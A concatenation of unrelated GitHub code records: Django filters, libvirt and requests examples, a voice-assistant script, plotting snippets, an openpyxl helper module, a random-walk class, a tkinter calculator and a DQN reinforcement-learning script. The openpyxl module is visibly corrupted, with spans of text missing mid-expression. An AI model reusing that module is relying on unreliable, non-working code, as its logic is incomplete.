\"FNo\": qs_sum[\"FNO\"],\n\n \"FPAE\": qs_sum[\"FPAE\"] + qs_sum[\"FPAOE\"],\n \"FPAEno\": qs_sum[\"FPAE\"],\n \"FPAEo\": qs_sum[\"FPAOE\"],\n\n \"error_sum\": qs_sum[\"FP\"] + qs_sum[\"FN\"] + qs_sum[\"FPAE\"]}\n\n\n@register.filter\ndef summary_short(query_set):\n \"\"\"short summary from result queryset\"\"\"\n\n # early exit\n if not query_set:\n return None\n qs_sum = summary(query_set)\n if not qs_sum:\n return None\n\n # result dict\n return {\n \"TP\": (qs_sum[\"TP\"] + qs_sum[\"TPO\"]) / float(qs_sum[\"KS\"]) * 100,\n \"FP\": (qs_sum[\"FS\"] - qs_sum[\"TP\"] - qs_sum[\"TPO\"]) / float(qs_sum[\"KS\"]) * 100}\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"pmeier82-zz/django-spikeval-franke","sub_path":"djspikeval_franke/templatetags/djspikeval_franke_tags.py","file_name":"djspikeval_franke_tags.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10275731811","text":"# Example-30.py\n#!/usr/bin/env python3\nimport sys\nimport libvirt\n\nconn = None\ntry:\n conn = libvirt.open(\"qemu:///system\")\nexcept libvirt.libvirtError as e:\n print(repr(e), file=sys.stderr)\n exit(1)\n\nstats = conn.getCPUStats(0)\n\nprint(\"kernel: \" + str(stats['kernel']))\nprint(\"idle: \" + str(stats['idle']))\nprint(\"user: \" + str(stats['user']))\nprint(\"iowait: \" + str(stats['iowait']))\n\nconn.close()\nexit(0)\n","repo_name":"libvirt/libvirt-appdev-guide-python","sub_path":"en-US/extras/Connections-Example-30.py","file_name":"Connections-Example-30.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"4390342679","text":"# -*- coding:utf-8 -*-\r\n\r\nimport minghu6.algs.func as func\r\n\r\n\r\ndef test_chain_apply():\r\n import operator\r\n from functools import partial\r\n funcs = [partial(operator.add, 1), partial(operator.mul, 2)]\r\n assert func.chain_apply(funcs, 3) == 8\r\n\r\n\r\ndef test_flatten():\r\n assert list(func.flatten([[1, 2], 3, [4], [5, [1, [2]]]])) == [1, 2, 3, 4, 5, 1, 2]\r\n\r\n\r\nif __name__ == '__main__':\r\n test_chain_apply()\r\n test_flatten()\r\n","repo_name":"minghu6/py-minghu6","sub_path":"minghu6_test/algs/func_test.py","file_name":"func_test.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"34158156921","text":"import requests\n\nBASE = \"http://127.0.0.1:5000/\"\n\ndata = [{\"name\": \"My First Video\", \"views\": 10000, \"likes\": 10},\n {\"name\": \"My second video\", \"views\": 20000, \"likes\": 50},\n {\"name\": \"How to make REST API in Python\", \"views\": 30000, \"likes\": 100}]\n\nresponse = requests.patch(BASE + \"video/2\", {\"name\": \"Tim\", \"views\": 100, \"likes\": 35})\nprint(response.json())\n\n# for i in range(len(data)):\n# response = requests.put(BASE + \"video/\" + str(i), data[i])\n# print(response.json())\n\ninput()\nresponse = requests.get(BASE + \"video/2\")\nprint(response.json())\n\n","repo_name":"nguyenle0912/Flask-RestAPI","sub_path":"Youtube_RestAPI/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"8627977691","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 8 06:09:34 2021\r\n\r\n@author: ediaz\r\n\"\"\"\r\n\r\nimport pyttsx3 as p\r\nimport speech_recognition as sr\r\nimport 
PySimpleGUI as sg\r\n\r\n\r\nengine = p.init()\r\nrate = engine.getProperty('rate')\r\nengine.setProperty('rate', 180)\r\nvoices = engine.getProperty('voices')\r\nengine.setProperty(\"voice\", voices[1].id)\r\n\r\n\r\ndef ToDoItem(num):\r\n return [sg.Text(f'{num}. '), sg.CBox(''), sg.In()]\r\n\r\ndef speak(text):\r\n engine.say(text)\r\n engine.runAndWait()\r\n \r\nr = sr.Recognizer()\r\n\r\nspeak(\"Hello sir I'm your voice assistant. How are you?\")\r\n\r\nwith sr.Microphone() as source:\r\n r.energy_threshold = 10000\r\n r.adjust_for_ambient_noise(source, 1.2)\r\n print(\"listening...\")\r\n audio = r.listen(source)\r\n text = r.recognize_google(audio)\r\n print(text)\r\nif \"what\" and \"about\" and \"you\" in text:\r\n speak(\"I am having a good day sir, thanks for asking.\")\r\nspeak(\"What can I do for you??\")\r\n\r\n#=============================================================================\r\nwith sr.Microphone() as source:\r\n r.energy_threshold = 10000\r\n r.adjust_for_ambient_noise(source, 1.2)\r\n print(\"listening...\")\r\n audio = r.listen(source)\r\n text = r.recognize_google(audio)\r\n print(text)\r\n \r\nif \"make me a to do list\":\r\n speak(\"Here's your to do list.\")\r\n layout = [ToDoItem(x) for x in range(1,6)] + [[sg.Button('Save'), sg.Button('Exit')]]\r\n window = sg.Window('To Do List Example', layout)\r\n event, values = window.read()\r\n \r\nif \"need\" and \"anything\":\r\n speak('Can you give me some more game ')\r\n\r\nwith sr.Microphone() as source:\r\n r.energy_threshold = 10000\r\n r.adjust_for_ambient_noise(source, 1.2)\r\n print(\"listening...\")\r\n audio = r.listen(source)\r\n text = r.recognize_google(audio)\r\n print(text)\r\n\r\nif\"you know what Im saying\" or \"you feel me\":\r\n speak(\"Facts, u aint never lie.\")\r\n#=============================================================================\r\n \r\n \r\n ","repo_name":"diazer86/voiceAssistant","sub_path":"voice _assistant.py","file_name":"voice _assistant.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"70354997652","text":"import numpy as np\nimport matplotlib.pyplot as plt \n\nf1 = plt.figure() \n#plt.axis([0, 4, 0, 10])\n\nplt.plot([1,2,3], [1,2,3], 'go-', label='line 1', linewidth=2)\nplt.plot([1,2,3], [1,4,9], 'rs-', label='line 2')\nplt.legend()\nplt.show()","repo_name":"listenviolet/Lab","sub_path":"ML/ch3_linear_model/3.5_LDA/src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18311730211","text":"import feedparser \r\nimport nltk\r\n\r\nurl = \"\"\r\nllog = feedparser.parse(\"{}\".format(url))\r\nentries = llog.entries\r\npost = entries[3]\r\ntitle = post.title\r\n\r\ncontent = post.content[2].value\r\ntokens = nltk.tokenize(nltk.clean_html(content))\r\nprint(tokens)\r\n","repo_name":"ackmedtijani/Python-Practices","sub_path":"Practice2.py","file_name":"Practice2.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21714625871","text":"from datasets import bc_idc, cifar10, cifar100, cinic10, yahoo, tiny_image_net, criteo, breast_cancer_wisconsin\r\nimport torchvision.datasets as datasets\r\n\r\n\r\ndef get_dataset_by_name(dataset_name):\r\n dict_dataset = {\r\n 'BC_IDC': bc_idc.IdcDataset,\r\n 'CIFAR10': datasets.CIFAR10,\r\n 'CIFAR100': 
datasets.CIFAR100,\r\n 'CINIC10L': cinic10.CINIC10L,\r\n 'Yahoo': yahoo.YahooSetup(),\r\n 'TinyImageNet': tiny_image_net.TinyImageNet,\r\n 'Criteo': criteo.Criteo,\r\n 'BCW': breast_cancer_wisconsin.BcwDataset\r\n }\r\n dataset = dict_dataset[dataset_name]\r\n return dataset\r\n\r\n\r\ndef get_datasets_for_ssl(dataset_name, file_path, n_labeled, party_num=None):\r\n dataset_setup = get_dataset_setup_by_name(dataset_name)\r\n train_labeled_set, train_unlabeled_set, test_set, train_complete_dataset = \\\r\n dataset_setup.set_datasets_for_ssl(file_path, n_labeled, party_num)\r\n return train_labeled_set, train_unlabeled_set, test_set, train_complete_dataset\r\n\r\n\r\ndef get_dataset_setup_by_name(dataset_name):\r\n dict_dataset_setup = {\r\n 'BC_IDC': bc_idc.IdcSetup(),\r\n 'CIFAR10': cifar10.Cifar10Setup(),\r\n 'CIFAR100': cifar100.Cifar100Setup(),\r\n 'CINIC10L': cinic10.Cinic10LSetup(),\r\n 'Yahoo': yahoo.YahooSetup(),\r\n 'TinyImageNet': tiny_image_net.TinyImageNetSetup(),\r\n 'Criteo': criteo.CriteoSetup(),\r\n 'BCW':breast_cancer_wisconsin.BcwSetup()\r\n }\r\n dataset_setup = dict_dataset_setup[dataset_name]\r\n return dataset_setup\r\n","repo_name":"FuChong-cyber/label-inference-attacks","sub_path":"Code/datasets/get_dataset.py","file_name":"get_dataset.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"66"} +{"seq_id":"35308562393","text":"from __future__ import annotations\nimport re\nimport openpyxl\nfrom typing import Optional,Any,Generator,Callable,Iterator,Iterable,NamedTuple\nfrom pathlib import Path\nfrom openpyxl.worksheet.worksheet import Worksheet\nfrom openpyxl import Workbook\nfrom collections import namedtuple\nfrom dataclasses import dataclass,field\nfrom types import MethodType\n\n_REPCHAR = ['/','-',' ','\\\\','&',]\n_REPCHAR_RE = re.compile(r'|'.join([fr\"{c}+\" for c in _REPCHAR]))\n_SNK_RE = re.compile(r'(?str:\n return f\"{self.__class__.__name__}({', '.join([k+'='+str(v) for (k,v) in self.__dict__.items()])})\"\n\n@dataclass\nclass ImplicitNamedRange:\n name:str\n min_row:int \n min_col:int\n max_col:int\n max_row:int\n sheet:Worksheet = field(repr=False)\n _nested:list[tuple[int,int]] = field(default_factory=list,repr=False)\n _nt:type = field(repr=False,default=None)\n\n def implicit_named_ranges(self)->dict[tuple[int,str],ImplicitNamedRange]:\n ret = {}\n if self._nested:\n for t in self._nested:\n nr = self.sheet._nr[t]\n ret[t] = nr\n for k,v in nr.implicit_named_ranges().items():\n ret[k] = v \n return ret\n\n @property\n def has_nested(self)->bool:\n return self._nested != []\n\n @staticmethod\n def _var_name(o:Any)->str:\n o = _REPCHAR_RE.sub('_',o)\n o = \"\".join(c for c in str(o) if c.isalnum() or c=='_')\n if not o or o[0].isnumeric():\n o = '_'+o\n return o\n\n\n @classmethod\n def _snake_case(cls,o:str)->str:\n return _SNK_RE.sub('_', cls._var_name(o)).lower()\n\n @classmethod\n def _camel_case(cls,o:str)->str:\n return ''.join(w.title() for w in cls._snake_case(o).split('_'))\n\n @property\n def nrows(self)->int:\n return self.max_row-self.min_row\n\n @property\n def top_row(self)->list[Any]:\n return list(self.iter_rows(max_row=1,values_only=True))[0]\n\n @property\n def header(self)->list[str]:\n return [self._snake_case(str(c)) for c in self.top_row]\n\n def iter_rows(self,values_only:bool=False,min_row:int=0,max_row:int=0)->Generator:\n min_row = self.min_row+min_row\n if not max_row or min_row+max_row>self.max_row:\n max_row = self.max_row\n else:\n 
max_row = min_row + max_row\n\n \n return self.sheet.iter_rows(min_row=min_row,\n max_row=max_row,\n max_col=self.max_col,\n min_col=self.min_col,\n values_only=values_only)\n\n\n def named_tuples(self,)->Generator[NamedTuple,None,None]:\n if not self._nt:\n try:\n self._nt = namedtuple(self._camel_case(self.name),' '.join(self.header))\n except ValueError as ve:\n raise Exception(\"Invalid header for namedtuple type\",ve)\n for row in self.iter_rows(min_row=1,values_only=True):\n\n yield self._nt(*row)\n\n def object(self,key_index:int=0,value_index:int=1):\n obj = type(self._camel_case(self.name), (Printable,), {})()\n for row in self.iter_rows(min_row=0,values_only=True):\n setattr(obj,self._snake_case(row[key_index]), row[value_index])\n return obj\n\n def dict(self,key_index:int=0,value_index:int=1,snake_case_keys:bool=False)->dict:\n if snake_case_keys:\n return {self._snake_case(row[key_index]): row[value_index] for \\\n row in self.iter_rows(min_row=0,values_only=True)}\n else:\n return {row[key_index]: row[value_index] for \\\n row in self.iter_rows(min_row=0,values_only=True)}\n def list(self,element:type=dict,snake_case_keys:bool=False,values_only:bool=True,\n element_keys:list[int]|list[str]=None)->list[tuple]|list[dict]:\n ret = []\n key_filter = lambda x,e:x is not None\n if element_keys:\n if isinstance(element_keys[0],str):\n key_filter = lambda x,e:x in e\n if element==dict:\n if snake_case_keys:\n header = self.header\n else:\n header = self.top_row\n _hi = []\n _hd = []\n for c,h in enumerate(header):\n if key_filter(h,element_keys):\n _hi.append(c)\n for row in self.iter_rows(min_row=1,values_only=values_only):\n nr = {}\n for i in _hi:\n nr[header[i]] = row[i]\n if any(nr.values()):\n ret.append(nr)\n else:\n break\n elif element in (tuple,list):\n for row in self.iter_rows(min_row=0,values_only=values_only):\n ret.append(element(row))\n return ret\n\ndef _set_sheet_inrs(sheet:Worksheet)->None:\n last_merge_row = max(sheet._merged_cells.keys(),default=0)\n for row,col_sets in list(sheet._merged_cells.items()):\n for start,end in col_sets:\n title = sheet.cell(row=row+1,column=start+1).value\n height = 0\n for sub_row in sheet.iter_rows(min_row=row+1,min_col=start+1,max_col=end+1,values_only=True):\n if any(sub_row):\n height+=1\n else:\n break\n sr = ImplicitNamedRange(title,max_row=row+height,min_row=row+2,min_col=start+1,max_col=end+1,sheet=sheet)\n if row < last_merge_row:\n for next_start,next_end in sheet._merged_cells[row+1]:\n if next_startend:\n break\n else:\n sr._nested.append((sheet.cell(row=row+2,column=next_start+1).value,row+1))\n suffix=1\n while (title,row) in sheet._nr:\n title = title + f'-{suffix}'\n suffix+=1\n if suffix>100:\n raise ValueError((title,row))\n sheet._nr[(title,row)] = sr\n\ndef implicit_named_ranges(sheet:Worksheet)->dict[tuple[str,int],ImplicitNamedRange]:\n if not sheet._nr:\n _set_sheet_inrs(sheet)\n return sheet._nr\n\n\n \ndef clear_values(self):\n for row in self:\n for cell in row:\n cell.value = None\n\ndef write_row(self,row:list,offset:tuple[int,int]=(1,1))->None:\n for column_count,value in enumerate(row):\n self.cell(row=offset[0],column=offset[1]+column_count).value = value\n\ndef write_rows(self,rows:list[list]|list[dict],offset:tuple[int,int]=(1,1))->None: \n if rows and isinstance(rows[0],dict):\n row_values = [list(rows[0].keys())]\n for row in rows:\n row_values.append(list(row.values()))\n for row_count,val in enumerate(row_values):\n self.write_row(val,(row_count+offset[0],offset[1]))\n\ndef 
open(pth:Path|str)->list[Course]:\n def _blanks(v:str|float|int):\n if v == \"\":\n return None\n return v\n pth = Path(pth)\n if pth.exists():\n wb = openpyxl.open(pth)\n for sc,sheet in enumerate(wb):\n sheet._merged_cells = {}\n sheet._nr = {}\n sheet.write_row = MethodType(write_row,sheet)\n sheet.write_rows = MethodType(write_rows,sheet)\n sheet.clear_values = MethodType(clear_values,sheet)\n if not sc:\n type(sheet).implicit_named_ranges = implicit_named_ranges\n \n for rc,row in enumerate(sheet.iter_rows()):\n row_keys = []\n key = []\n if any(isinstance(cell, openpyxl.cell.cell.MergedCell) for cell in row):\n for cc,cell in enumerate(row):\n if not isinstance(cell,openpyxl.cell.cell.MergedCell):\n if len(key)>1:\n row_keys.append(tuple([key[0],key[-1]]))\n key = [cc] \n else:\n key.append(cc)\n if len(key)>1:\n row_keys.append(tuple([key[0],key[-1]]))\n sheet._merged_cells[rc] = list(row_keys)\n else: \n break\n \n\n return wb\n \n \n \n \n\n\n#wb = open(r'test\\ATS.xlsx')\n#for sheet in wb:\n #print(sheet.title)\n #print(list(sheet.implicit_named_ranges()))\n ","repo_name":"dvanbolt/TrainerCourses","sub_path":"TrainerCourses/openpyxl_extension.py","file_name":"openpyxl_extension.py","file_ext":"py","file_size_in_byte":8605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10270800972","text":"import matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nfrom tqdm import tqdm\nimport matplotlib\nimport matplotlib.lines as mlines\n\n# open-type fonts\nmatplotlib.rcParams['pdf.fonttype'] = 42\n\n#\ns_res = [0, 0, 1, 2, 2, 2, 2, 2, 2, 2]\nm_res = [0, 0, 1, 5, 13, 13, 13, 13, 13, 13]\nl_res = [0, 0, 1, 5, 13,-47,-62,-62,-62,-62]\n\ndef draw(data,name):\n\n for i,d in enumerate(data):\n fig = plt.figure(figsize=(2,10))\n ax = plt.subplot(111)\n ax.set_ylim((-70,70))\n\n bars = ax.bar([0], [d], width=1, color='r' if d < 0 else 'g')\n ax.set_yscale('symlog')\n\n for rect in bars:\n height = rect.get_height()\n plt.text(rect.get_x() + rect.get_width()/2.0, height, ('' if height < 0 else '+')+'%d' % int(height), ha='center', va='bottom', size=36, color='w'if height<0 else 'g')\n\n plt.gca().get_xaxis().set_ticks([])\n plt.gca().get_yaxis().set_ticks([])\n plt.minorticks_off()\n # plt.majorticks_off()\n plt.ylabel('Net Resource Collected',fontsize=36)\n\n plt.gca().spines['top'].set_visible(False)\n plt.gca().spines['right'].set_visible(False)\n plt.gca().spines['bottom'].set_visible(False)\n plt.gca().spines['left'].set_visible(False)\n ax.axhline(y=0, color='k')\n\n plt.tight_layout(pad=0.4)\n\n plt.savefig('img/explanatory_sep/'+name+'-'+str(i+1)+'.pdf',transparent=True)\n\ndraw(s_res,'rs')\ndraw(m_res,'rm')\ndraw(l_res,'rl')\n","repo_name":"mmore500/alife-2018-presentation","sub_path":"script/explanatory_resource.py","file_name":"explanatory_resource.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43440426941","text":"'''\n* 홀수인 자연수가 주어지면 달팽이 모양으로 숫자 출력\n\n* 방향 설정 후, 방향대로 이동했�� 때 장애물이 있으면 방향 수정하는 느낌으로 풀기\n'''\n\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\np = int(input())\n\n\narrays = [[0]*N for _ in range(N)]\n\n# 방향은 고정(하 우 상 좌)\ndx = [1,0,-1,0]\ndy = [0,1,0,-1]\n\nn = N**2\nx,y = 0,0\narrays[0][0] = n\n\n# 숫자 p의 인덱스\nX,Y = 0,0\n\ni = 0\nwhile n > 1:\n \n nx = x + dx[i]\n ny = y + dy[i] \n\n if nx <= N-1 and ny <= N-1 and nx >= 0 and ny >= 0 and arrays[nx][ny] == 0:\n arrays[nx][ny] = n-1\n 
if n-1 == p:\n X = nx\n Y = ny\n x = nx\n y = ny\n n -= 1\n\n else:\n i = (i+1) % 4\n\nfor array in arrays:\n print(*array)\n\n'''\n* 이렇게 하면 시간 더 걸림\nfor i in range(N):\n for j in range(N):\n print(array[i][j], end = \" \")\n print()\n'''\n\n \nprint(X+1,Y+1) \n\n \n \n \n \n \n\n","repo_name":"percyfrank/CodingTest_OldVersion","sub_path":"BAEKJOON/구현/s3_달팽이.py","file_name":"s3_달팽이.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"69862930132","text":"# -*- coding: utf-8 \n# simple random walk program\n\nimport numpy as np\nimport random\nfrom walker import Walker\n\n\nclass Walk:\n\t\"\"\"\n\tRandom walk class at the moment in 1D and 2D only\n\t\"\"\"\n\tdef __init__(self,steplength,dx,d=1):\n\t\tself.dx = dx\n\n\t\tself.d = d \t#dimension of the walk\n\t\tself.steplength = steplength\n\t\tself.walkers = []\n\t\tself.nwalkers = 0\n\t\tself.left = self.right = 0\n\n\n\t\tself._x1 = 1 + self.dx/2.0\n\t\tself._x0 = 0 - self.dx/2.0\n\n\tdef AddWalker(self,pos):\n\t\t# print \"Adding walker\"\n\t\ttmp = Walker(pos)\n\t\tself.walkers.append(tmp)\n\n\n\tdef Solve(self):\n\n\t\tself.left = self.right = 0\n\t\tl_limit = 3*self.dx\n\t\tr_limit = 4*self.dx\n\t\tindices = []\n\t\twalkers_leaving_area = []\n\t\tcounter = 0\n\n\t\tfor walker in self.walkers:\n\t\t\tdirection = (-1)**random.randint(0,1)\n\t\t\tif walker.r > l_limit and walker.r _x1:\n\t\t\twalker.r += 2*(_x1-walker.r)\n\n\n\n","repo_name":"fepettersen/fuzzy-dangerzone","sub_path":"src/walk.py","file_name":"walk.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33429602772","text":"from aiohttp import web\n\n\nclass Application(web.Application):\n def __init__(self):\n super().__init__()\n self.router.add_post(\n '/internal/eats-order-send/v1/order/event', self.post_order_event,\n )\n\n async def post_order_event(self, _):\n return web.json_response({})\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/docker-integration-tests/mock-server/mock_server/modules/eats_order_send.py","file_name":"eats_order_send.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4311802679","text":"from tkinter import Tk, Label, Entry, Button\nfrom tkinter import messagebox\n\ndef suma():\n a_value = float(a.get())\n b_value = float(b.get())\n if b_value == 0:\n # messagebox.showerror(\"Dzielenie przez 0!!!\", \"Zmień b\")\n wynik.configure(text=f\"Błąd!\")\n return\n wynik.configure(text=f\"{a_value / b_value}\")\n\n\nroot = Tk()\nroot.columnconfigure(1, weight=1)\nlabel_a = Label(master=root, text=\"Liczba a: \")\nlabel_a.grid(row=0, column=0)\na = Entry(master=root)\na.grid(row=0, column=1)\n\nlabel_b = Label(master=root, text=\"Liczba b: \")\nlabel_b.grid(row=1, column=0)\nb = Entry(master=root)\nb.grid(row=1, column=1)\n\nsum_button = Button(master=root, text=\"Dziel\", command=suma)\nsum_button.grid(row=2, column=0)\n\nwynik = Label(master=root, text=\"-\")\nwynik.grid(row=2, column=1)\n\nroot.mainloop()\n","repo_name":"rkorzen/python_bootcamp_08102022","sub_path":"dzien_08/tkinte_grid_example.py","file_name":"tkinte_grid_example.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1846694682","text":"from poutyne import 
Model\nfrom copy import deepcopy # NEW\n\nimport numpy as np\nimport gym\nimport torch\nimport random\nimport matplotlib.pyplot as plt \nimport pickle\n\n\nclass ReplayBuffer:\n def __init__(self, buffer_size):\n self.__buffer_size = buffer_size\n self.data = []\n \n\n def store(self, element):\n '''\n Stores an element. If the replay buffer is already full, deletes the oldest\n element to make space.\n '''\n \n # TODO: implement\n self.data.append(element)\n\n if (len(self.data) > self.__buffer_size) : \n del self.data[0]\n\n \n\n def get_batch(self, batch_size):\n '''\n Returns a list of batch_size elements from the buffer.\n '''\n \n # TODO: implement\n return random.choices(self.data, k=batch_size)\n\n\ndef evaluate_policy(env, model, render):\n scores = 0\n turns = 1\n for j in range(turns):\n states, done, ep_rewards, steps = env.reset(), False, 0, 0\n steps = 0\n ep_r = 0\n while not done and steps < 600:\n actions = []\n for s in states:\n q_vals =model.predict_on_batch(s.astype(np.float32)) \n actions.append(model.select_action(q_vals, epsilon=0, evaluate=True))\n next_states, rewards, done, info = env.step(actions)\n ep_r += np.sum(rewards)\n steps += 1\n states = next_states\n if render:\n env.render()\n scores += ep_r\n return scores/turns\n\nclass DQN(Model):\n def __init__(self, actions, *args, **kwargs):\n self.actions = actions\n super().__init__(*args, **kwargs)\n\n def select_action(self, state, epsilon=0, evaluate=False):\n '''\n Returns the selected action according to an epsilon-greedy policy.\n '''\n\n if np.random.rand() < epsilon and not evaluate:\n action = self.actions.sample()\n else:\n action = np.argmax(state)\n \n return action\n\n def soft_update(self, other, tau):\n '''\n Code for the soft update between a target network (self) and\n a source network (other).\n\n The weights are updated according to the rule in the assignment.\n '''\n new_weights = {}\n\n own_weights = self.get_weight_copies()\n other_weights = other.get_weight_copies()\n\n for k in own_weights:\n new_weights[k] = (1 - tau) * own_weights[k] + tau * other_weights[k]\n\n self.set_weights(new_weights)\n\n\nclass NNModel(torch.nn.Module):\n '''\n Neural Network with 3 hidden layers of hidden dimension 64.\n '''\n\n def __init__(self, in_dim, out_dim, n_hidden_layers=3, hidden_dim=64):\n super().__init__()\n layers = [torch.nn.Linear(in_dim, hidden_dim), torch.nn.ReLU()]\n for _ in range(n_hidden_layers - 1):\n layers.extend([torch.nn.Linear(hidden_dim, hidden_dim), torch.nn.ReLU()])\n layers.append(torch.nn.Linear(hidden_dim, out_dim))\n\n self.fa = torch.nn.Sequential(*layers)\n\n def forward(self, x):\n return self.fa(x)\n\n\ndef format_batch(batch, target_network, gamma):\n '''\n Input : \n - batch, a list of n=batch_size elements from the replay buffer\n - target_network, the target network to compute the one-step lookahead target\n - gamma, the discount factor\n\n Returns :\n - states, a numpy array of size (batch_size, state_dim) containing the states in the batch\n - (actions, targets) : where actions and targets both\n have the shape (batch_size, ). 
Actions are the \n selected actions according to the target network\n and targets are the one-step lookahead targets.\n '''\n \n states = np.array([x[0] for x in batch]) \n actions = np.array([x[1] for x in batch])\n rewards = np.array([x[2] for x in batch]) \n next_states = np.array([x[3] for x in batch]) \n dones = np.array([x[4] for x in batch])\n\n next_q_vals = target_network.predict_on_batch(next_states)\n\n max_qvals = np.max(next_q_vals, axis=-1)\n targets = rewards + gamma * max_qvals * (1 -dones)\n targets = targets.astype(np.float32)\n return states, (actions, targets)\n\n\ndef dqn_loss(y_pred, y_target):\n '''\n Input :\n - y_pred, (batch_size, n_actions) Tensor outputted by the network\n - y_target = (actions, targets), where actions and targets both\n have the shape (batch_size, ). Actions are the \n selected actions according to the target network\n and targets are the one-step lookahead targets.\n\n Returns :\n - The DQN loss \n '''\n \n\n actions, Q_target = y_target\n \n try:\n Q_predict = y_pred.gather(1, actions.unsqueeze(-1).to(torch.int64)).squeeze()\n except:\n print(actions, y_pred.shape)\n return torch.nn.functional.mse_loss(Q_predict, Q_target)\n\n\ndef set_random_seed(environment, seed):\n environment.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed) # NEW\n\n\ndef run(batch_size, gamma, buffer_size, seed, tau, training_interval, learning_rate):\n environment = gym.make('gym_ants:ants-v0')\n eval_env = gym.make('gym_ants:ants-v0')\n eval_env.seed(seed)\n set_random_seed(environment, seed)\n\n\n model = NNModel(6, 4)\n nb_trajectories = 500\n\n\n source_agent = DQN(environment.action_space, network=model, optimizer=torch.optim.Adam(model.parameters(), lr=learning_rate), loss_function=dqn_loss)\n target_agent = DQN(environment.action_space, network=model, optimizer=torch.optim.Adam(model.parameters(), lr=learning_rate), loss_function=dqn_loss)\n\n replay_buffer = ReplayBuffer(buffer_size)\n epsilon = 1.0\n R_trajectories = np.zeros(nb_trajectories)\n loss = []\n avg_training_loss = np.zeros(nb_trajectories)\n scores_history = []\n for n_trajectories in range(nb_trajectories):\n trajectory_done = False\n\n G = 0\n\n states = environment.reset()\n step_count = 1\n mean_loss = []\n while not trajectory_done and step_count <600:\n #environment.render()\n actions = []\n for s in states:\n q_vals =target_agent.predict_on_batch(s.astype(np.float32)) \n actions.append(target_agent.select_action(q_vals, epsilon))\n next_states, rewards, trajectory_done, _ = environment.step(actions)\n G += np.sum(rewards)\n for (s, a, r, next_s) in zip(states, actions, rewards, next_states):\n replay_buffer.store((s.astype(np.float32) , a, r, next_s.astype(np.float32) , trajectory_done))\n\n if len(replay_buffer.data) > batch_size :\n if (step_count % training_interval == 0) :\n minibatch = replay_buffer.get_batch(batch_size)\n \n states_, (actions_taken, targets) = format_batch(minibatch, target_agent, gamma)\n loss_ = source_agent.train_on_batch(states_, (actions_taken, targets))\n loss.append(loss_)\n mean_loss.append(loss_)\n target_agent.soft_update( source_agent, tau)\n\n states = next_states\n step_count += 1\n \n if n_trajectories % 10 == 0:\n\n loss_mean = loss[-1]\n score = evaluate_policy(eval_env, target_agent, render=False)\n scores_history.append(score)\n print('Epoch {}:'.format(n_trajectories),'score:', score)\n #print(f\"After {n_trajectories} trajectories, we have G_0 = {G:.2f}, loss {loss_mean}, epsilon {epsilon:4f}\")\n \n\n epsilon = max(0.99*epsilon, 0.01)\n 
R_trajectories[n_trajectories] = G\n avg_training_loss[n_trajectories] = np.mean(np.array(mean_loss))\n environment.close()\n eval_env.close()\n return scores_history\n \n\nif __name__ == \"__main__\":\n '''\n All hyperparameter values and overall code structure are only given as a baseline. \n \n You can use them if they help you, but feel free to implement from scratch the\n required algorithms if you wish!\n '''\n batch_size =64\n gamma = 0.9\n buffer_size = 4e5\n seed = 42\n tau = 0.1\n training_interval = 10\n learning_rate = 1*1e-4\n\n seed = 42\n\n nb_runs = 20\n np.random.seed(seed)\n histories = []\n for _ in range(nb_runs):\n s = np.random.randint(1000)\n histories.append(run(batch_size, gamma, buffer_size, seed, tau, training_interval, learning_rate))\n\n avg_experiments_cumulative_rewards = np.mean(histories, axis=0)\n std_experiments_cumulative_rewards = np.std(histories , axis=0)\n\n epochs = np.array(range(len(avg_experiments_cumulative_rewards)))*10\n plt.plot(epochs, avg_experiments_cumulative_rewards, label = \"SAC\") \n plt.fill_between(epochs, avg_experiments_cumulative_rewards, \n avg_experiments_cumulative_rewards+std_experiments_cumulative_rewards, alpha=0.4)\n \n with open('history/scores_history_SAC{}'.format(seed), 'wb') as fp:\n pickle.dump(histories, fp)\n\n\n plt.xlabel(\"Épisodes\")\n plt.ylabel(\"Récompenses\")\n\n plt.legend()\n plt.show()\n\n","repo_name":"TheophileBERTELOOT/PetriDish","sub_path":"main_DQN.py","file_name":"main_DQN.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74678667731","text":"import pandas as pd\nfrom DataLoader import Data\nimport glob\nimport json\n#############################################################################\n# Copy from 